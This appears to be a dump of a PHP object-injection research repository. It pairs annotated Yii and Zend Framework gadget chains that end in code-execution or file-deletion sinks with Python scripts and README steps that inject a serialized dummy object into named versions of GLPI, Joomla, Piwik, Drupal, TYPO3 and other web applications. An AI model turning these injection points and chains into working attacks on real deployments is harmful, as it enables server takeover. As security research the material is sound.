--------------------------------------------------------------------------------
/PHPGGC/Yii_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. CDbCriteria::__wakeup // foreach
 3 |     2. CMapIterator::current // $this->_d[$this->_key]
 4 |     3. CFileCache::offsetGet(CCache::offsetGet)
 5 |     4. CFileCache::get(CCache::get)
 6 |     5. call_user_func
 7 | */
 8 | 
 9 | // vendor/yiisoft/yii/framework/db/schema/CDbCriteria.php
10 | class CDbCriteria extends CComponent {
11 |     public function __wakeup() {
12 |         $map=array();
13 |         $params=array();
14 |         foreach($this->params as $name=>$value) { // [*] next (call current)
15 |             if(strpos($name,self::PARAM_PREFIX)===0) {
16 |                 $newName=self::PARAM_PREFIX.self::$paramCount++;
17 |                 $map[$name]=$newName;
18 |             }
19 |             else {
20 |                 $newName=$name;
21 |             }
22 |             $params[$newName]=$value;
23 |         }
24 |         ...
25 |     }
26 | }
27 | 
28 | // vendor/yiisoft/yii/framework/collections/CMapIterator.php
29 | class CMapIterator implements Iterator {
30 |     public function current() {
31 |         return $this->_d[$this->_key]; // [*] next (call offsetGet)
32 |     }
33 | }
34 | 
35 | // vendor/yiisoft/yii/framework/caching/CFileCache.php
36 | class CFileCache extends CCache {
37 | }
38 | 
39 | // vendor/yiisoft/yii/framework/caching/CCache.php
40 | abstract class CCache extends CApplicationComponent implements ICache, ArrayAccess {
41 |     public function offsetGet($id) {
42 |         return $this->get($id); // [*] next
43 |     }
44 |     
45 |     public function get($id) {
46 |         $value = $this->getValue($this->generateUniqueKey($id));
47 |         if($value===false || $this->serializer===false)
48 |             return $value;
49 |         if($this->serializer===null)
50 |             $value=unserialize($value);
51 |         else
52 |             $value=call_user_func($this->serializer[1], $value); // [*] sink
53 |         if(is_array($value) && (!$value[1] instanceof ICacheDependency || !$value[1]->getHasChanged())) {
54 |             Yii::trace('Serving "'.$id.'" from cache','system.caching.'.get_class($this));
55 |             return $value[0];
56 |         }
57 |         else
58 |             return false;
59 |     }
60 | }


--------------------------------------------------------------------------------
/PHPGGC/ZendFramework_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Zend_Http_Response_Stream::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // library/Zend/Http/Response/Stream.php
 7 | class Zend_Http_Response_Stream extends Zend_Http_Response {
 8 |     public function __destruct() {
 9 |         if(is_resource($this->stream)) {
10 |             fclose($this->stream);
11 |             $this->stream = null;
12 |         }
13 |         if($this->_cleanup) {
14 |             @unlink($this->stream_name); // [*] sink
15 |         }
16 |     }
17 | }


--------------------------------------------------------------------------------
/PHPGGC/ZendFramework_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Zend_Log::__destruct
 3 |     2. \Zend_Log_Writer_Mail::shutdown
 4 |     3. \Zend_Layout::render
 5 |     4. \Zend_Filter_PregReplace::filter
 6 |     5. preg_replace
 7 | */
 8 | 
 9 | // library/Zend/Log.php
10 | class Zend_Log {
11 |     public function __destruct() {
12 |         /** @var Zend_Log_Writer_Abstract $writer */
13 |         foreach($this->_writers as $writer) {
14 |             $writer->shutdown(); // [*] next
15 |         }
16 |     }
17 | }
18 | 
19 | // library/Zend/Log/Writer/Mail.php
20 | class Zend_Log_Writer_Mail extends Zend_Log_Writer_Abstract {
21 |     public function shutdown() {
22 |         // If there are events to mail, use them as message body.  Otherwise,
23 |         // there is no mail to be sent.
24 |         if (empty($this->_eventsToMail)) {
25 |             return;
26 |         }
27 | 
28 |         if ($this->_subjectPrependText !== null) {
29 |             // Tack on the summary of entries per-priority to the subject
30 |             // line and set it on the Zend_Mail object.
31 |             $numEntries = $this->_getFormattedNumEntriesPerPriority();
32 |             $this->_mail->setSubject(
33 |                 "{$this->_subjectPrependText} ({$numEntries})");
34 |         }
35 | 
36 | 
37 |         // Always provide events to mail as plaintext.
38 |         $this->_mail->setBodyText(implode('', $this->_eventsToMail));
39 | 
40 |         // If a Zend_Layout instance is being used, set its "events"
41 |         // value to the lines formatted for use with the layout.
42 |         if ($this->_layout) {
43 |             // Set the required "messages" value for the layout.  Here we
44 |             // are assuming that the layout is for use with HTML.
45 |             $this->_layout->events =
46 |                 implode('', $this->_layoutEventsToMail);
47 | 
48 |             // If an exception occurs during rendering, convert it to a notice
49 |             // so we can avoid an exception thrown without a stack frame.
50 |             try {
51 |                 $this->_mail->setBodyHtml($this->_layout->render()); // [*] next
52 |             } catch (Exception $e) {
53 |                 trigger_error(
54 |                     "exception occurred when rendering layout; " .
55 |                         "unable to set html body for message; " .
56 |                         "message = {$e->getMessage()}; " .
57 |                         "code = {$e->getCode()}; " .
58 |                         "exception class = " . get_class($e),
59 |                     E_USER_NOTICE);
60 |             }
61 |         }
62 |         
63 |         ...
64 |     }
65 | }
66 | 
67 | // library/Zend/Layout.php
68 | class Zend_Layout {
69 |     public function render($name = null) {
70 |         if (null === $name) {
71 |             $name = $this->getLayout();
72 |         }
73 | 
74 |         if ($this->inflectorEnabled() && (null !== ($inflector = $this->getInflector())))
75 |         {
76 |             $name = $this->_inflector->filter(array('script' => $name)); // [*] next
77 |         }
78 | 
79 |         ...
80 |     }
81 | }
82 | 
83 | // library/Zend/Filter/PregReplace.php
84 | class Zend_Filter_PregReplace implements Zend_Filter_Interface {
85 |     public function filter($value) {
86 |         if ($this->_matchPattern == null) {
87 |             require_once 'Zend/Filter/Exception.php';
88 |             throw new Zend_Filter_Exception(get_class($this) . ' does not have a valid MatchPattern set.');
89 |         }
90 | 
91 |         return preg_replace($this->_matchPattern, $this->_replacement, $value); // [*] sink
92 |     }
93 | }


--------------------------------------------------------------------------------
/PHPGGC/ZendFramework_RCE2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Zend_Form_Element::__toString
 3 |     2. \Zend_Form_Element::render
 4 |     3. \Zend_Form_Decorator_Form::render ($view->$helper)
 5 |     4. \Zend_Cache_Frontend_Function::call
 6 |     5. user_func_array
 7 | */
 8 | 
 9 | // library/Zend/Form/Element.php
10 | class Zend_Form_Element implements Zend_Validate_Interface {
11 |     public function __toString() {
12 |         try {
13 |             $return = $this->render(); // [*] next
14 |             return $return;
15 |         } catch (Exception $e) {
16 |             trigger_error($e->getMessage(), E_USER_WARNING);
17 |             return '';
18 |         }
19 |     }
20 |     
21 |     public function render(Zend_View_Interface $view = null) {
22 |         if ($this->_isPartialRendering) {
23 |             return '';
24 |         }
25 | 
26 |         if (null !== $view) {
27 |             $this->setView($view);
28 |         }
29 | 
30 |         $content = '';
31 |         foreach ($this->getDecorators() as $decorator) {
32 |             $decorator->setElement($this);
33 |             $content = $decorator->render($content); // [*] next
34 |         }
35 |         return $content;
36 |     }
37 | }
38 | 
39 | // library/Zend/Form/Decorator/Form.php
40 | class Zend_Form_Decorator_Form extends Zend_Form_Decorator_Abstract {
41 |     public function render($content) {
42 |         $form    = $this->getElement();
43 |         $view    = $form->getView();
44 |         if (null === $view) {
45 |             return $content;
46 |         }
47 | 
48 |         $helper        = $this->getHelper();
49 |         $attribs       = $this->getOptions();
50 |         $name          = $form->getFullyQualifiedName();
51 |         $attribs['id'] = $form->getId();
52 |         return $view->$helper($name, $attribs, $content); // [*] next
53 |                                                           // [!] need to set $view->$helper to call Zend_Cache_Frontend_Function::call
54 |     }
55 | }
56 | 
57 | // library/Zend/Cache/Frontend/Function.php
58 | class Zend_Cache_Frontend_Function extends Zend_Cache_Core {
59 |     public function call($callback, array $parameters = array(), $tags = array(), $specificLifetime = false, $priority = 8) {
60 |         if (!is_callable($callback, true, $name)) {
61 |             Zend_Cache::throwException('Invalid callback');
62 |         }
63 | 
64 |         $cacheBool1 = $this->_specificOptions['cache_by_default'];
65 |         $cacheBool2 = in_array($name, $this->_specificOptions['cached_functions']);
66 |         $cacheBool3 = in_array($name, $this->_specificOptions['non_cached_functions']);
67 |         $cache = (($cacheBool1 || $cacheBool2) && (!$cacheBool3));
68 |         if (!$cache) {
69 |             // Caching of this callback is disabled
70 |             return call_user_func_array($callback, $parameters); // [*] sink
71 |         }
72 | 
73 |         $id = $this->_makeId($callback, $parameters);
74 |         if ( ($rs = $this->load($id)) && isset($rs[0], $rs[1])) {
75 |             // A cache is available
76 |             $output = $rs[0];
77 |             $return = $rs[1];
78 |         } else {
79 |             // A cache is not available (or not valid for this frontend)
80 |             ob_start();
81 |             ob_implicit_flush(false);
82 |             $return = call_user_func_array($callback, $parameters); // [*] sink
83 |             $output = ob_get_clean();
84 |             $data = array($output, $return);
85 |             $this->save($data, $id, $tags, $specificLifetime, $priority);
86 |         }
87 | 
88 |         echo $output;
89 |         return $return;
90 |     }
91 | }


--------------------------------------------------------------------------------
/Proxy/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | EMPTY = -1
3 | INST = os.path.dirname(os.path.realpath(__file__)) + '/../Fuzzer/Instrumentor.php'
4 | FUZZER = os.path.dirname(os.path.realpath(__file__)) + '/../Fuzzer/Fuzzer.php'
5 | FAIL_LOG = os.path.dirname(os.path.realpath(__file__)) + '/../Files/fuzz_fail.log'
6 | 


--------------------------------------------------------------------------------
/Trigger/ccs_run.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | SITE = 'http://127.0.0.1'
 7 | data = {
 8 |   'contao': ['contao_poc.py', 'k.jones', 'kevinjones'],
 9 |   'piwik': ['piwik_poc.py', 'admin', 'asdf1234'],
10 |   'glpi': ['glpi_poc.py', 'glpi', 'glpi'],
11 |   'joomla': ['joomla_poc.py'],
12 |   'cubecart': ['cubecart_poc.py'],
13 |   'cmsmadesimple': ['cmsmadesimple_poc.py', 'admin', 'asdf1234'],
14 |   'owa': ['owa_poc.py'],  
15 |   'vanilla': ['vanilla_poc.py', 'admin', 'asdf1234'],
16 | }
17 | 
18 | if len(sys.argv) != 2:
19 |   print ('[Usage] {} [app_path]'.format(sys.argv[0]))
20 |   sys.exit()
21 | 
22 | ROOT = "http://127.0.0.1"
23 | APP_PATH = sys.argv[1][:-1] if sys.argv[1].endswith('/') else sys.argv[1]
24 | APP_NAME = os.path.basename(APP_PATH)
25 | 
26 | for k, v in data.items():
27 |   if k in APP_NAME:
28 |     script = v[0]
29 |     args = " ".join(v[1:])
30 |     cmd = 'python3 {} {}/{} {}'.format(script, ROOT, APP_NAME, args)
31 |     print(cmd)
32 |     os.system(cmd)
33 |     break
34 | 
35 | 


--------------------------------------------------------------------------------
/Trigger/cmsmadesimple_poc.py:
--------------------------------------------------------------------------------
 1 | # CMS Made Simple (1.11.9) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | 
 7 | def printUsageAndExit():
 8 |     print("[#] Usage: python [BASEURL] [ADMINID] [ADMINPW]")
 9 |     exit()
10 | 
11 | def login(baseurl, adminid, adminpw):
12 |     URL = "{}{}".format(baseurl, "/admin/login.php")
13 |     login_data = {
14 |             "username": adminid,
15 |             "password": adminpw,
16 |             "loginsubmit": "Submit"
17 |             }
18 |     with requests.Session() as session:
19 |         r = session.post(URL, data = login_data)
20 |         if(r.text.find("login.php") > -1):
21 |             print("[!] Login Failed!");
22 |             exit()
23 |         else:
24 |             return session
25 | 
26 | if __name__ != '__main__':
27 |     exit()
28 | 
29 | if(len(sys.argv) < 4):
30 |     printUsageAndExit()
31 | 
32 | BASEURL = sys.argv[1]
33 | ADMINID = sys.argv[2]
34 | ADMINPW = sys.argv[3]
35 | 
36 | # Get Token (_sx_)
37 | session = login(BASEURL, ADMINID, ADMINPW)
38 | sx_token_req = session.get("{}{}".format(BASEURL, "/admin/index.php"))
39 | soup = BeautifulSoup(sx_token_req.text, features="html.parser")
40 | changeperm_url = soup.find("a", {"class": "groupperms"})['href']
41 | sx_token = changeperm_url.split("=")[1]
42 | PAYLOAD = {
43 |         "_sx_": sx_token,
44 |         'submitted': '1'
45 |         }
46 | 
47 | # Get original permission setting
48 | get_origin_set = session.get("{}{}{}".format(BASEURL, "/admin/", changeperm_url))
49 | soup = BeautifulSoup(get_origin_set.text, features="html.parser")
50 | permtable = soup.find("table", {"class": "pagetable", "id": "permtable"})
51 | for permission_td in permtable.findAll("td"):
52 |     perm_box = permission_td.find("input")
53 |     if perm_box is not None:
54 |         if(perm_box.has_attr('checked') and not perm_box.has_attr('disabled')):
55 |             PAYLOAD[perm_box['name']] = '1'
56 | 
57 | # Submit PAYLOAD
58 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
59 | PAYLOAD['sel_groups'] = base64.b64encode(TRIGGER_INPUT.encode("ascii"))
60 | change_perm = session.post("{}{}".format(BASEURL, "/admin/changegroupperm.php"),
61 |                             data = PAYLOAD)
62 | # print(change_perm.text)
63 | 


--------------------------------------------------------------------------------
/Trigger/contao_poc.py:
--------------------------------------------------------------------------------
 1 | # GLPI (0.83.9) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | import random
 7 | 
 8 | def printUsageAndExit():
 9 |     print("[#] Usage: python [BASEURL] [ADMINID] [ADMINPW]")
10 |     exit()
11 | 
12 | def login(baseurl, adminid, adminpw):
13 |     URL = "{}{}".format(baseurl, "/contao/")
14 |     with requests.Session() as session:
15 |         csrf_req = session.get(baseurl)
16 |         soup = BeautifulSoup(csrf_req.text, features="html.parser")
17 |         csrf_token = soup.find("input", {"name": "REQUEST_TOKEN"})['value']
18 |         login_data = {
19 |         		"FORM_SUBMIT":	"tl_login",
20 | 				"REQUEST_TOKEN": csrf_token,
21 | 				"username": adminid,
22 | 				"password": adminpw,
23 | 				"language": "",
24 | 				"login": "Login"
25 |                 }
26 |         header = {
27 |                 "Referer": "{}{}".format(baseurl, "/contao/")
28 |                 }
29 |         r = session.post(URL, data = login_data, headers = header)
30 |         if(r.text.find("system/cron/cron.txt") > -1):
31 |             print("[!] Login Failed!")
32 |             exit()
33 |         else:
34 |             return session
35 | 
36 | if __name__ != '__main__':
37 |     exit()
38 | 
39 | if(len(sys.argv) < 4):
40 |     printUsageAndExit()
41 | 
42 | BASEURL = sys.argv[1]
43 | ADMINID = sys.argv[2]
44 | ADMINPW = sys.argv[3]
45 | 
46 | # Get token
47 | session = login(BASEURL, ADMINID, ADMINPW)
48 | token_req = session.get("{}{}".format(BASEURL, "/contao/main.php?do=article"))
49 | soup = BeautifulSoup(token_req.text, features="html.parser")
50 | token = soup.find("input", {"name": "REQUEST_TOKEN"})['value']
51 | 
52 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
53 | 
54 | PAYLOAD = {
55 |  "FORM_SUBMIT": "tl_select",
56 |  "REQUEST_TOKEN": token,
57 |  "IDS": TRIGGER_INPUT,
58 |  "edit": "Edit"
59 | }
60 | 
61 | header = {
62 |         "Referer": "{}{}{}".format(BASEURL, "/contao/main.php?do=article&act=select&rt=", token)
63 |         }
64 | 
65 | # Submit PAYLOAD
66 | poc_req = session.post("{}{}{}".format(BASEURL, "/contao/main.php?do=article&act=select&rt=", token),
67 |                         headers = header, data = PAYLOAD)
68 | 
69 | # print(poc_req.text)
70 | 


--------------------------------------------------------------------------------
/Trigger/cubecart_poc.py:
--------------------------------------------------------------------------------
 1 | # Cubecart (5.2.0) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | 
 7 | def printUsageAndExit():
 8 |     print("[#] Usage: python [BASEURL]")
 9 |     exit()
10 | 
11 | def addCart(baseurl):
12 |     URL = "{}{}".format(baseurl, "/index.php?_g=ajaxadd")
13 |     with requests.Session() as session:
14 |         idx_req = session.get(baseurl)
15 |         soup = BeautifulSoup(idx_req.text, features="html.parser")
16 |         prod_idx = soup.find("input", {"name": "add", "type": "hidden"})['value']
17 | 
18 |         cart_data = {
19 |                 "add": str(prod_idx)
20 |                 }
21 |         r = session.post(URL, data = cart_data)
22 |         if(r.text.find("product_id={}".format(prod_idx)) == -1):
23 |             print("[!] Addcart Failed!");
24 |             exit()
25 |         else:
26 |             return session
27 | 
28 | if __name__ != '__main__':
29 |     exit()
30 | 
31 | if(len(sys.argv) < 2):
32 |     printUsageAndExit()
33 | 
34 | BASEURL = sys.argv[1]
35 | 
36 | # Get token
37 | session = addCart(BASEURL)
38 | 
39 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
40 | PAYLOAD = {
41 |     "quan[db2dee7afed9e264003941e5bd471ac6]": (None, "1"), # TODO: Need to be change dynamically
42 |     "shipping": (None, base64.b64encode(TRIGGER_INPUT.encode("ascii"))),
43 |     "coupon": (None, ""),
44 |     "proceed": (None, "Checkout")
45 | }
46 | 
47 | 
48 | # Submit PAYLOAD
49 | poc_req = session.post("{}{}".format(BASEURL, "/index.php?_a=basket"),
50 |                         files = PAYLOAD)
51 | 
52 | # print(poc_req.text)
53 | 


--------------------------------------------------------------------------------
/Trigger/drupal/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/drupal/.gitkeep


--------------------------------------------------------------------------------
/Trigger/drupal/README.md:
--------------------------------------------------------------------------------
 1 | ### Trigger the POI vulnerability of drupal 7.78
 2 | 
 3 | 1. Enter http://143.248.47.101:7272/drupal-7.78/
 4 | ![img1](./drupal_1.png)
 5 | 
 6 | 2. Login (Username: admin / Password: asdf1234)
 7 | ![img2](./drupal_2.png)
 8 | 
 9 | 3. Click Configuration -> File system, 
10 | or enter http://143.248.47.101:7272/drupal-7.78/node?admin/config#overlay=admin/config/media/file-system
11 | ![img4](./drupal_3.png)
12 | 
13 | 4. Enter `phar:///app/phar_validator/dummy_class_r353t.png` in `Temporary directory` field
14 | ![img5](./drupal_4.png)
15 | 
16 | 5. Click `Save configuration`
17 | 


--------------------------------------------------------------------------------
/Trigger/drupal/drupal_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/drupal/drupal_1.png


--------------------------------------------------------------------------------
/Trigger/drupal/drupal_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/drupal/drupal_2.png


--------------------------------------------------------------------------------
/Trigger/drupal/drupal_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/drupal/drupal_3.png


--------------------------------------------------------------------------------
/Trigger/drupal/drupal_4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/drupal/drupal_4.png


--------------------------------------------------------------------------------
/Trigger/glpi_poc.py:
--------------------------------------------------------------------------------
 1 | # GLPI (0.83.9) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | import random
 7 | 
 8 | def printUsageAndExit():
 9 |     print("[#] Usage: python [BASEURL] [ADMINID] [ADMINPW]")
10 |     exit()
11 | 
12 | def login(baseurl, adminid, adminpw):
13 |     URL = "{}{}".format(baseurl, "/login.php")
14 |     with requests.Session() as session:
15 |         csrf_req = session.get(baseurl)
16 |         soup = BeautifulSoup(csrf_req.text, features="html.parser")
17 |         csrf_token = soup.find("input", {"name": "_glpi_csrf_token"})['value']
18 | 
19 |         login_data = {
20 |                 '_glpi_csrf_token': csrf_token,
21 |                 "login_name": adminid,
22 |                 "login_password": adminpw,
23 |                 "submit": "Post"
24 |                 }
25 |         header = {
26 |                 "Referer": "{}{}".format(baseurl, "/index.php")
27 |                 }
28 |         r = session.post(URL, data = login_data, headers = header)
29 |         if(r.text.find("Incorrect username or password") > -1):
30 |             print("[!] Login Failed!");
31 |             exit()
32 |         else:
33 |             return session
34 | 
35 | if __name__ != '__main__':
36 |     exit()
37 | 
38 | if(len(sys.argv) < 4):
39 |     printUsageAndExit()
40 | 
41 | BASEURL = sys.argv[1]
42 | ADMINID = sys.argv[2]
43 | ADMINPW = sys.argv[3]
44 | 
45 | # Get token
46 | session = login(BASEURL, ADMINID, ADMINPW)
47 | token_req = session.get("{}{}".format(BASEURL, "/front/ticket.form.php"))
48 | soup = BeautifulSoup(token_req.text, features="html.parser")
49 | token = soup.find("input", {"name": "_glpi_csrf_token"})['value']
50 | 
51 | MONTH = "{}".format(random.randint(1,30)).rjust(2, "0")
52 | DAY = "{}".format(random.randint(1,28)).rjust(2, "0")
53 | 
54 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
55 | PAYLOAD = {
56 |     "date": (None, "2020-{}-{} 15:08:00".format(MONTH, DAY)),
57 |     "due_date": (None, "NULL"),
58 |     "slas_id": (None, "0"),
59 |     "type": (None, "1"),
60 |     "itilcategories_id": (None, "0"),
61 |     "_users_id_requester": (None, "5"), # I think, this argument need to be changed.
62 |     "entities_id": (None, "0"),
63 |     "_groups_id_requester": (None, "0"),
64 |     "_users_id_observer": (None, "0"),
65 |     "_groups_id_observer": (None, "0"),
66 |     "_users_id_assign": (None, "2"),
67 |     "_groups_id_assign": (None, "0"),
68 |     "suppliers_id_assign": (None, "0"),
69 |     "status": (None, "new"),
70 |     "requesttypes_id": (None, "1"),
71 |     "urgency": (None, "3"),
72 |     "_add_validation": (None, "0"),
73 |     "impact": (None, "3"),
74 |     "_my_items": (None, ""),
75 |     "itemtype": (None, ""),
76 |     "priority": (None, "3"),
77 |     "actiontime": (None, "0"),
78 |     "name": (None, ""),
79 |     "content": (None, ""),
80 |     "filename[]": (None, ""),
81 |     "_link[link]": (None, "1"),
82 |     "_link[tickets_id_1]": (None, "0"),
83 |     "_link[tickets_id_2]": (None, ""),
84 |     "_tickettemplates_id": (None, "1"),
85 |     "_predefined_fields": (None, TRIGGER_INPUT),
86 |     "id": (None, "0"),
87 |     "_glpi_csrf_token": (None, token)
88 | }
89 | 
90 | header = {
91 |         "Referer": "{}{}".format(BASEURL, "/front/ticket.form.php")
92 |         }
93 | 
94 | # Submit PAYLOAD
95 | poc_req = session.post("{}{}".format(BASEURL, "/front/ticket.form.php"),
96 |                         headers = header, files = PAYLOAD)
97 | 
98 | # print(poc_req.text)
99 | 


--------------------------------------------------------------------------------
/Trigger/joomla_poc.py:
--------------------------------------------------------------------------------
 1 | # Joomla (3.0.2) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | import urllib.parse
 7 | 
 8 | def printUsageAndExit():
 9 |     print("[#] Usage: python [BASEURL]")
10 |     exit()
11 | 
12 | if __name__ != '__main__':
13 |     exit()
14 | 
15 | if(len(sys.argv) < 2):
16 |     printUsageAndExit()
17 | 
18 | BASEURL = sys.argv[1]
19 | 
20 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
21 | PAYLOAD = {
22 |         "highlight": base64.b64encode(TRIGGER_INPUT.encode('ascii'))
23 |         }
24 | # Submit PAYLOAD
25 | poc_req = requests.get("{}{}".format(BASEURL, "/index.php"), params = PAYLOAD)
26 | print(poc_req.text)
27 | 


--------------------------------------------------------------------------------
/Trigger/lib_run.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | import requests
 3 | import sys
 4 | import base64
 5 | 
 6 | if len(sys.argv) < 2:
 7 |     print ('[Usage] {} [application_path]'.format(sys.argv[0]))
 8 |     sys.exit()
 9 | 
10 | ROOT = "http://127.0.0.1/"
11 | URL = sys.argv[1]
12 | URL = URL.split('/')[-2] if URL.endswith('/') else URL.split('/')[-1]
13 | inp = base64.b64encode(b'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}')
14 | FULL_URL = ROOT + URL+"/?input="+inp.decode('utf-8')
15 | print (FULL_URL)
16 | r = requests.post(FULL_URL)
17 | print(r.text)
18 | 


--------------------------------------------------------------------------------
/Trigger/owa_poc.py:
--------------------------------------------------------------------------------
 1 | # Open Web Analytics (1.5.6) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | 
 6 | def printUsageAndExit():
 7 |     print("[#] Usage: python [BASEURL]")
 8 |     exit()
 9 | 
10 | if __name__ != '__main__':
11 |     exit()
12 | 
13 | if(len(sys.argv) < 2):
14 |     printUsageAndExit()
15 | 
16 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
17 | 
18 | URL = "{}{}".format(sys.argv[1], "/queue.php")
19 | PAYLOAD = {"owa_event": base64.b64encode(TRIGGER_INPUT.encode("ascii"))}
20 | r = requests.post(URL, data = PAYLOAD)
21 | # print(r.text)
22 | 


--------------------------------------------------------------------------------
/Trigger/piwik_poc.py:
--------------------------------------------------------------------------------
 1 | # Piwik (0.4.5) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | import urllib.parse
 7 | 
 8 | def printUsageAndExit():
 9 |     print("[#] Usage: python [BASEURL] [USERID] [USERPW]")
10 |     exit()
11 | 
12 | def login(baseurl, adminid, adminpw):
13 |     URL = "{}{}".format(baseurl, "/index.php?module=CoreHome")
14 |     login_data = {
15 |             "form_login": adminid,
16 |             "form_password": adminpw
17 |             }
18 |     with requests.Session() as session:
19 |         r = session.post(URL, data = login_data)
20 |         if(r.text.find("form_login") > -1):
21 |             print("[!] Login Failed!");
22 |             exit()
23 |         else:
24 |             return session
25 | 
26 | if __name__ != '__main__':
27 |     exit()
28 | 
29 | if(len(sys.argv) < 4):
30 |     printUsageAndExit()
31 | 
32 | BASEURL = sys.argv[1]
33 | ADMINID = sys.argv[2]
34 | ADMINPW = sys.argv[3];
35 | 
36 | # Get Token (_sx_)
37 | session = login(BASEURL, ADMINID, ADMINPW)
38 | PAYLOAD = session.cookies.get_dict()
39 | print(PAYLOAD)
40 | 
41 | TRIGGER_INPUT = 'O:17:"dummy_class_r353t":1:{s:12:"used_methods";a:0:{}}'
42 | # Submit PAYLOAD
43 | PAYLOAD['piwik_auth'] = "%3ADUMMY%3D"
44 | PAYLOAD['piwik_auth'] += "{}".format(urllib.parse.quote(
45 |                                 base64.b64encode(TRIGGER_INPUT.encode('ascii'))))
46 | session.cookies = requests.utils.cookiejar_from_dict(PAYLOAD)
47 | poc_req = session.get("{}{}".format(BASEURL, "/index.php?module=Dashboard"),
48 |                             params = PAYLOAD)
49 | # print(poc_req.text)
50 | 


--------------------------------------------------------------------------------
/Trigger/typo3/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/.gitkeep


--------------------------------------------------------------------------------
/Trigger/typo3/README.md:
--------------------------------------------------------------------------------
 1 | ### Trigger the POI vulnerability of typo3
 2 | 
 3 | 1. Enter http://143.248.47.101:7272/typo3_9.3.0/typo3/
 4 | ![img1](./typo3_1.png)
 5 | 
 6 | 2. Login (Username: admin / Password: asdf1234)
 7 | ![img2](./typo3_2.png)
 8 | 
 9 | 3. Click `Page` -> `New TYPO3 site` (right click) -> `New`
10 | ![img3](./typo3_3.png)
11 | 
12 | 4. Enter any contents in `Page Title` field and click `Save`
13 | ![img4](./typo3_4.png)
14 | 
15 | 5. Right click the generated page and click `Content` button
16 | ![img5](./typo3_5.png)
17 | 
18 | 6. Click `Header Only` button
19 | ![img6](./typo3_6.png)
20 | 
21 | 7. Enter `phar:///app/phar_validator/dummy_class_r353t.png` in `Link` field
22 | ![img7](./typo3_7.png)
23 | 
24 | 8. Click `Save` button
25 | 


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_1.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_2.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_3.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_4.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_5.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_6.png


--------------------------------------------------------------------------------
/Trigger/typo3/typo3_7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Trigger/typo3/typo3_7.png


--------------------------------------------------------------------------------
/Trigger/vanilla_poc.py:
--------------------------------------------------------------------------------
 1 | # Vanilla Forums (2.0.18.5) - PoC
 2 | import requests
 3 | import sys
 4 | import base64
 5 | from bs4 import BeautifulSoup
 6 | import urllib.parse
 7 | 
 8 | def printUsageAndExit():
